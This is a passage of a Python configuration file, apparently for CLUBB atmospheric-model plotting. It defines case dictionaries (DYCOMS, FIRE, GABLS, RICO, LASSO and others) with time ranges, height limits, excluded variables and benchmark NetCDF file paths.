'dycoms2_rf02_ds_restart', 'description': "Copied from plotgen: ** Uniform, coarse verticle grid spacing of 40 m. **", 'start_time': 181, 'end_time': 240, 'height_min_value': 0, 'height_max_value': 1200, 'blacklisted_vars': [], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/DYCOMS_RF02_128x128x96_dr_sed/DYCOMS_RF02_128x128x96_dr_sed.nc"}, 'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_ds_restart_zm.nc', 'zt': clubb_output_root + '/dycoms2_rf02_ds_restart_zt.nc', 'sfc': clubb_output_root + '/dycoms2_rf02_ds_restart_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_ds_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_ds_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_ds_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_sfc.nc'}, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupCorrelations, VariableGroupKKMP]} DYCOMS2_RF02_SO = {'name': 'dycoms2_rf02_so', 'description': "Copied from plotgen: " + "** WRF-type stretched (unevenly spaced) grid (grid_type = 3) ** ", 'start_time': 301, 'end_time': 360, 'height_min_value': 0, 'height_max_value': 1200, 'blacklisted_vars': ['wprrp', 'wpNrp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/DYCOMS_RF02_128x128x96_nodr_sed/DYCOMS_RF02_128x128x96_nodr_sed.nc"}, 'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_so_zm.nc', 'zt': clubb_output_root + '/dycoms2_rf02_so_zt.nc', 'sfc': clubb_output_root + '/dycoms2_rf02_so_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_so_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_so_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_so_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_so_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_so_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_so_sfc.nc'}, 'e3sm_file': None, 'cam_file': None, 'sam_file': {'sam': sam_output_root + "/DYCOMS_RF02_SAM_CLUBB.nc"}, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupKKMP]} FIRE = {'name': 'fire', 'description': "", 'start_time': 61, 'end_time': 120, 'height_min_value': 0, 'height_max_value': 1000, 'blacklisted_vars': [], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/fire_zm.nc', 'zt': clubb_output_root + '/fire_zt.nc', 'sfc': clubb_output_root + '/fire_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/fire_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/fire_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/fire_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/fire_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/fire_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + "/fire_zm.nc", 'zt': HOC_OUTPUT_ROOT + '/fire_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/fire_sfc.nc'}, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': {'zm': wrf_output_root + "/fire_zm_wrf.nc", 'zt': wrf_output_root + "/fire_zt_wrf.nc", 'sfc': wrf_output_root + "/fire_sfc_wrf.nc" }, 'var_groups': [VariableGroupBase, VariableGroupWs]} # No budgets GABLS2 = {'name': 'gabls2', 'description': "", 'start_time': 2101, 'end_time': 2160, 'height_min_value': 0, 'height_max_value': 2500, 'blacklisted_vars': ['tau_zm', 'radht', 'Skw_zt', 'Skrt_zt', 'Skthl_zt', 'corr_w_chi_1', 'corr_chi_eta_1', 'rcp2', 'thlpthvp', 'rtpthvp'], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/gabls2_zm.nc', 'zt': clubb_output_root + '/gabls2_zt.nc', 'sfc': clubb_output_root + '/gabls2_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/gabls2_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/gabls2_coamps_sw.nc", 'sfc': COAMPS_BENCHMARK_OUTPUT_ROOT + "/gabls2_coamps_sfc.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase]} GABLS2_NIGHTLY = {'name': 'gabls2_nightly', 'description': "", 'start_time': 2101, 'end_time': 2160, 'height_min_value': 0, 'height_max_value': 2500, 'blacklisted_vars': [], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/gabls2_zm.nc', 'zt': clubb_output_root + '/gabls2_zt.nc', 'sfc': clubb_output_root + '/gabls2_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupScalars]} GABLS3 = {'name': 'gabls3', 'description': "", 'start_time': 1081, 'end_time': 1200, 'height_min_value': 0, 'height_max_value': 4970, 'blacklisted_vars': [], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/gabls3_zm.nc', 'zt': clubb_output_root + '/gabls3_zt.nc', 'sfc': clubb_output_root + '/gabls3_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase]} GABLS3_NIGHT = {'name': 'gabls3_night', 'description': "Copied from plotgen: Uses a 5-min timestep with 48 levels", 'start_time': 421, 'end_time': 480, 'height_min_value': 0, 'height_max_value': 800, 'blacklisted_vars': [], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/SAM6.6/GABLS3_NIGHT/gabls3_night.nc"}, 'clubb_file': {'zm': clubb_output_root + '/gabls3_night_zm.nc', 'zt': clubb_output_root + '/gabls3_night_zt.nc', 'sfc': clubb_output_root + '/gabls3_night_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase]} GATE_SHEAR_RLSF = {'name': 'gate_shear_rlsf', 'description': "", 'start_time': 540, 'end_time': 720, 'height_min_value': 0, 'height_max_value': 24000, 'blacklisted_vars': [], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/SAM6.6/GATE_shear_rlsf/GATE_shear_rlsf_64x64x128_1km_5s.nc"}, 'clubb_file': None, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': {'sam': sam_output_root + "/GATE_SAM_CLUBB.nc"}, 'wrf_file': None, 'var_groups': [VariableGroupBase]} # Use to plot IOP forced SAM runs IOP = {'name': 'iop', 'description': "", 'start_time': 181, 'end_time': 1440, 'height_min_value': 0, 'height_max_value': 27750, 'blacklisted_vars': [], 'clubb_datasets': None, 'sam_benchmark_file': None, 'clubb_file': None, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'var_groups': [VariableGroupBase, VariableGroupSamProfiles]} JUN25_ALTOCU = {'name': 'jun25_altocu', 'description': "", 'start_time': 181, 'end_time': 240, 'height_min_value': 4825, 'height_max_value': 7290, 'blacklisted_vars': ['Ngm', 'wprrp', 'wpNrp'], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/jun25_altocu_zm.nc', 'zt': clubb_output_root + '/jun25_altocu_zt.nc', 'sfc': clubb_output_root + '/jun25_altocu_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/jun25_altocu_qc3_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/jun25_altocu_qc3_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} LBA = {'name': 'lba', 'description': "Note that sam-plotgen plots up to a height of 16000 not 12000.\n" "Copied from plotgen: SAM-LES uses Morrison microphysics " + "and CLUBB standalone uses COAMPS microphysics", 'start_time': 300, 'end_time': 360, 'height_min_value': 0, 'height_max_value': 14000, 'blacklisted_vars': ['wprrp', 'wpNrp', 'Ngm'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/LBA_128kmx128kmx128_1km_Morrison/LBA_128kmx128kmx128_1km_Morrison.nc"}, 'clubb_file': {'zm': clubb_output_root + '/lba_zm.nc', 'zt': clubb_output_root + '/lba_zt.nc', 'sfc': clubb_output_root + '/lba_sfc.nc', 'subcolumns': clubb_output_root + '/lba_nl_lh_sample_points_2D.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': {'sam': sam_output_root + "/LBA_SAM_CLUBB.nc"}, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP, VariableGroupWs]} MC3E = {'name': 'mc3e', 'description': "", 'start_time': 60, 'end_time': 64800, 'height_min_value': 0, 'height_max_value': 18000, 'blacklisted_vars': ['rtp3', 'Skrt_zt', 'Skthl_zt', 'rtpthvp', 'thlpthvp', 'wprrp', 'wpNrp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/MC3E_r1359_128x128x128_1km_Morrison/MC3E.nc"}, 'clubb_file': {'zm': clubb_output_root + '/mc3e_zm.nc', 'zt': clubb_output_root + '/mc3e_zt.nc', 'sfc': clubb_output_root + '/mc3e_sfc.nc', 'subcolumns': clubb_output_root + '/mc3e_nl_lh_sample_points_2D.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} MPACE_A = {'name': 'mpace_a', 'description': "Copied from plotgen: SAM-LES and CLUBB standalone use Morrison microphysics", 'start_time': 4141, 'end_time': 4320, 'height_min_value': 0, 'height_max_value': 10000, 'blacklisted_vars': ['Skrt_zt', 'Skthl_zt', 'rtpthvp', 'thlpthvp', 'Ngm', 'wpNrp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/SAM6.6/MPACE_A/MPACE_A_128x128x69_morr_CEM.nc"}, 'clubb_file': {'zm': clubb_output_root + '/mpace_a_zm.nc', 'zt': clubb_output_root + '/mpace_a_zt.nc', 'sfc': clubb_output_root + '/mpace_a_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} MPACE_B = {'name': 'mpace_b', 'description': "Copied from plotgen: **The nightly simulation uses COAMPS microphysics**", 'start_time': 541, 'end_time': 720, 'height_min_value': 0, 'height_max_value': 2750, 'blacklisted_vars': ['Ngm', 'wpNrp'], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/mpace_b_zm.nc', 'zt': clubb_output_root + '/mpace_b_zt.nc', 'sfc': clubb_output_root + '/mpace_b_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/mpace_b_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/mpace_b_coamps_sw.nc", 'sfc': COAMPS_BENCHMARK_OUTPUT_ROOT + "/mpace_b_coamps_sfc.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} MPACE_B_SILHS = {'name': 'mpace_b_silhs', 'description': "", 'start_time': 541, 'end_time': 720, 'height_min_value': 0, 'height_max_value': 2750, 'blacklisted_vars': ['Ngm', 'wpNrp'], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/mpace_b_silhs_zm.nc', 'zt': clubb_output_root + '/mpace_b_silhs_zt.nc', 'sfc': clubb_output_root + '/mpace_b_silhs_sfc.nc', 'subcolumns': clubb_output_root + '/mpace_b_silhs_nl_lh_sample_points_2D.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/mpace_b_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/mpace_b_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} NOV11_ALTOCU = {'name': 'nov11_altocu', 'description': "", 'start_time': 91, 'end_time': 150, 'height_min_value': 4160, 'height_max_value': 6150, 'blacklisted_vars': ['Ngm'], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/nov11_altocu_zm.nc', 'zt': clubb_output_root + '/nov11_altocu_zt.nc', 'sfc': clubb_output_root + '/nov11_altocu_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/nov11_altocu_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/nov11_altocu_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/nov11_altocu_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/nov11_altocu_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/nov11_altocu_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/nov11_altocu_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/nov11_altocu_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/nov11_altocu_sfc.nc'}, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} RICO = {'name': 'rico', 'description': "Cam output may differ from plotgen due to a difference in time averaging.", 'start_time': 4201, 'end_time': 4320, 'height_min_value': 0, 'height_max_value': 5000, 'blacklisted_vars': [], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/RICO_256x256x100_drizzle/RICO_256x256x100_drizzle.nc"}, 'clubb_file': {'zm': clubb_output_root + '/rico_zm.nc', 'zt': clubb_output_root + '/rico_zt.nc', 'sfc': clubb_output_root + '/rico_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/rico_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/rico_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': {'e3sm': e3sm_output_root + "/rico.nc"}, 'cam_file': {'cam': cam_output_root + "/rico_cam.nc"}, 'sam_file': {'sam': sam_output_root + "/RICO_256x256x100_drizzle.nc"}, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupWs, VariableGroupCorrelations, VariableGroupKKMP]} RICO_SILHS = {'name': 'rico_silhs', 'description': "Copied from plotgen: CLUBB and SAM use Khairoutdinov-Kogan microphysics", 'start_time': 4201, 'end_time': 4320, 'height_min_value': 0, 'height_max_value': 4500, 'blacklisted_vars': ['wpNrp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/RICO_256x256x100_drizzle/RICO_256x256x100_drizzle.nc"}, 'clubb_file': {'zm': clubb_output_root + '/rico_silhs_zm.nc', 'zt': clubb_output_root + '/rico_silhs_zt.nc', 'sfc': clubb_output_root + '/rico_silhs_sfc.nc', 'subcolumns': clubb_output_root + '/rico_silhs_nl_lh_sample_points_2D.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/rico_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/rico_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupWs, VariableGroupCorrelations, VariableGroupKKMP]} NEUTRAL = {'name': 'neutral', 'description': "", 'start_time': 181, 'end_time': 360, 'height_min_value': 0, 'height_max_value': 1500, 'blacklisted_vars': [], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/NEUTRAL/NEUTRAL_96x96x96_32m_10m_LES.nc"}, 'clubb_file': {'zm': clubb_output_root + '/neutral_zm.nc', 'zt': clubb_output_root + '/neutral_zt.nc', 'sfc': clubb_output_root + '/neutral_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs]} TWP_ICE = {'name': 'twp_ice', 'description': "Copied from plotgen: Both vertical and horizontal fluxes applied to THLM and RTM for LES. " "LES nudged U, V, RTM and THLM toward observed values. Forcings for LES derived from 10mb " "forcing data.", 'start_time': 60, 'end_time': 9900, 'height_min_value': 0, 'height_max_value': 19000, 'blacklisted_vars': ['rtp3', 'Skrt_zt', 'Skthl_zt', 'rtpthvp', 'thlpthvp', 'wprrp', 'wpNrp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/TWP_ICE_r1315_128x128x128_1km_Morrison/TWP_ICE.nc"}, 'clubb_file': {'zm': clubb_output_root + '/twp_ice_zm.nc', 'zt': clubb_output_root + '/twp_ice_zt.nc', 'sfc': clubb_output_root + '/twp_ice_sfc.nc', 'subcolumns': clubb_output_root + '/twp_ice_nl_lh_sample_points_2D.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupIceMP]} WANGARA = {'name': 'wangara', 'description': "Note that COAMPS benchmark data is actually RAMS data by default.", 'start_time': 181, 'end_time': 240, 'height_min_value': 0, 'height_max_value': 1900, 'blacklisted_vars': ['Ngm'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/WANGARA/WANGARA_64x64x80_100m_40m_LES.nc"}, 'clubb_file': {'zm': clubb_output_root + '/wangara_zm.nc', 'zt': clubb_output_root + '/wangara_zt.nc', 'sfc': clubb_output_root + '/wangara_sfc.nc'}, 'coamps_benchmark_file': {'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/wangara_rams.nc", 'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/wangara_rams.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/wangara_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/wangara_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/wangara_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/wangara_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/wangara_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/wangara_sfc.nc'}, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': {'zm': wrf_output_root + "/wangara_zm_wrf.nc", 'zt': wrf_output_root + "/wangara_zt_wrf.nc", 'sfc': wrf_output_root + "/wangara_sfc_wrf.nc" }, 'var_groups': [VariableGroupBase, VariableGroupWs]} LASSO_20170627 = {'name': 'lasso_20170627', 'description': "Comparing WRF-CLUBB output to WRF-LASSO output.", 'start_time': 301, 'end_time': 600, 'height_min_value': 0, 'height_max_value': 4000, 'blacklisted_vars': [], 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_benchmark_file': {'lasso_benchmark': WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2017-06-27/wrf_lasso_stats_2017-06-27.nc"}, 'sam_benchmark_file': None, 'coamps_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'clubb_file': None, 'wrf_file': {'zm': clubb_output_root + '/lasso_2017-06-27_zm_wrf.nc', 'zt': clubb_output_root + '/lasso_2017-06-27_zt_wrf.nc', 'sfc': clubb_output_root + '/lasso_2017-06-27_sfc_wrf.nc', 'subcolumns': clubb_output_root + '/lasso_2017-06-27_nl_lh_sample_points_2D.nc'}, 'var_groups': [VariableGroupBase, VariableGroupWs]} LASSO_20170717 = {'name': 'lasso_20170717', 'description': "Comparing WRF-CLUBB output to WRF-LASSO output.", 'start_time': 301, 'end_time': 600, 'height_min_value': 0, 'height_max_value': 4000, 'blacklisted_vars': [], 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_benchmark_file': {'lasso_benchmark': WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2017-07-17/wrf_lasso_stats_2017-07-17.nc"}, 'sam_benchmark_file': None, 'coamps_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'clubb_file': None, 'wrf_file': {'zm': clubb_output_root + '/lasso_2017-07-17_zm_wrf.nc', 'zt': clubb_output_root + '/lasso_2017-07-17_zt_wrf.nc', 'sfc': clubb_output_root + '/lasso_2017-07-17_sfc_wrf.nc', 'subcolumns': clubb_output_root + '/lasso_2017-07-17_nl_lh_sample_points_2D.nc'}, 'var_groups': [VariableGroupBase, VariableGroupWs]} LASSO_20170728 = {'name': 'lasso_20170728', 'description': "Comparing WRF-CLUBB output to WRF-LASSO output.", 'start_time': 301, 'end_time': 600, 'height_min_value': 0, 'height_max_value': 4000, 'blacklisted_vars': [], 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_benchmark_file': {'lasso_benchmark': WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2017-07-28/wrf_lasso_stats_2017-07-28.nc"}, 'sam_benchmark_file': None, 'coamps_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'clubb_file': None, 'wrf_file': {'zm': clubb_output_root + '/lasso_2017-07-28_zm_wrf.nc', 'zt': clubb_output_root + '/lasso_2017-07-28_zt_wrf.nc', 'sfc': clubb_output_root + '/lasso_2017-07-28_sfc_wrf.nc', 'subcolumns': clubb_output_root + '/lasso_2017-07-28_nl_lh_sample_points_2D.nc'}, 'var_groups': [VariableGroupBase, VariableGroupWs]} LASSO_20170923 = {'name': 'lasso_20170923', 'description': "Comparing WRF-CLUBB output to WRF-LASSO output.", 'start_time': 301, 'end_time': 600, 'height_min_value': 0, 'height_max_value': 4000, 'blacklisted_vars': [], 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_benchmark_file': {'lasso_benchmark': WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2017-09-23/wrf_lasso_stats_2017-09-23.nc"}, 'sam_benchmark_file': None, 'coamps_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'clubb_file': None, 'wrf_file': {'zm': clubb_output_root + '/lasso_2017-09-23_zm_wrf.nc', 'zt': clubb_output_root + '/lasso_2017-09-23_zt_wrf.nc', 'sfc': clubb_output_root + '/lasso_2017-09-23_sfc_wrf.nc', 'subcolumns': clubb_output_root + '/lasso_2017-09-23_nl_lh_sample_points_2D.nc'}, 'var_groups': [VariableGroupBase, VariableGroupWs]} LASSO_20180911 = {'name': 'lasso_20180911', 'description': "Comparing WRF-CLUBB output to WRF-LASSO output.", 'start_time': 301, 'end_time': 600, 'height_min_value': 0, 'height_max_value': 4000, 'blacklisted_vars': [], 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_benchmark_file': {'lasso_benchmark': WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2018-09-11/wrf_lasso_stats_2018-09-11.nc"}, 'sam_benchmark_file': None, 'coamps_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'clubb_file': None, 'wrf_file': {'zm': clubb_output_root + '/lasso_2018-09-11_zm_wrf.nc', 'zt': clubb_output_root + '/lasso_2018-09-11_zt_wrf.nc', 'sfc': clubb_output_root + '/lasso_2018-09-11_sfc_wrf.nc', 'subcolumns': clubb_output_root + '/lasso_2018-09-11_nl_lh_sample_points_2D.nc'}, 'var_groups': [VariableGroupBase, VariableGroupWs]} LASSO_20180917 = {'name': 'lasso_20180917', 'description': "Comparing WRF-CLUBB output to WRF-LASSO output.", 'start_time': 301, 'end_time': 600, 'height_min_value': 0, 'height_max_value': 4000, 'blacklisted_vars': [], 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_benchmark_file': {'lasso_benchmark': WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2018-09-17/wrf_lasso_stats_2018-09-17.nc"}, 'sam_benchmark_file': None, 'coamps_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'clubb_file': None, 'wrf_file': {'zm': clubb_output_root + '/lasso_2018-09-17_zm_wrf.nc', 'zt': clubb_output_root + '/lasso_2018-09-17_zt_wrf.nc', 'sfc': clubb_output_root + '/lasso_2018-09-17_sfc_wrf.nc', 'subcolumns': clubb_output_root + '/lasso_2018-09-17_nl_lh_sample_points_2D.nc'}, 'var_groups': [VariableGroupBase, VariableGroupWs]} LASSO_20180918 = {'name': 'lasso_20180918', 'description': "Comparing WRF-CLUBB output to WRF-LASSO output.", 'start_time': 301, 'end_time': 600, 'height_min_value': 0, 'height_max_value': 4000, 'blacklisted_vars': [], 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_benchmark_file': {'lasso_benchmark': WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2018-09-18/wrf_lasso_stats_2018-09-18.nc"}, 'sam_benchmark_file': None, 'coamps_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'clubb_file': None, 'wrf_file': {'zm': clubb_output_root + '/lasso_2018-09-18_zm_wrf.nc', 'zt': clubb_output_root + '/lasso_2018-09-18_zt_wrf.nc', 'sfc': clubb_output_root + '/lasso_2018-09-18_sfc_wrf.nc', 'subcolumns': clubb_output_root + '/lasso_2018-09-18_nl_lh_sample_points_2D.nc'}, 'var_groups': [VariableGroupBase, VariableGroupWs]} LASSO_20181002 = {'name': 'lasso_20181002', 'description': "Comparing WRF-CLUBB output to WRF-LASSO output.", 'start_time': 301, 'end_time': 600, 'height_min_value': 0, 'height_max_value': 4000, 'blacklisted_vars': [], 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 